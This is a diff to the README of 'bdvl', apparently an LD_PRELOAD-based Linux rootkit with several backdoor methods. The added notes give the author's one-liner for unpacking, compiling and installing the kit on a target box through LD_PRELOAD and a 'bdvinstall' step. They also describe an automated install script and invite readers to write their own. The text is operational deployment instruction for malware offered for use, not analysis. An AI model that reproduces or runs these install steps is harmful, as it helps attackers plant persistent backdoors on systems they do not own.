clayne/bdvl/README.md

  * In the example below I am using the 3 backdoor methods available in bdvl.

 <img src=https://i.imgur.com/pqpJHTy.png alt=first-backdoor-login />

+### 2.2.
+Notes
+ * Due to how bdvl installs itself, there is some pretty decent flexibility when it comes to how you can get your install onto the box.
+ * To try to explain, I'll use a oneliner that I frequently use while testing...
+ * `tar xpfz bdvl.tar.gz && rm bdvl.tar.gz; cd bdvl/; nano setup.py; clear; make; LD_PRELOAD=./build/bdvl.so.`uname -m` sh -c './bdvinstall build/*.so.*'`
+   * Now this is on my test environment, so...
+   * I uploaded `bdvl.tar.gz` prior to running that...
+   * Dependencies are already present...
+ * Once I exit nano, the kit compiles, installs itself & then is ready to go & I can access any backdoor I like.
+   * This is basically a much shorter version of `etc/auto.sh` however that script uses an already-configured setup, so there is no editing `setup.py` beforehand.
+   * Not to mention that `etc/auto.sh` installs required dependencies before trying to install the kit.
+   * My point is ultimately that you can create your own (idea of) `etc/auto.sh` if that's something you'd like to do.

 <hr>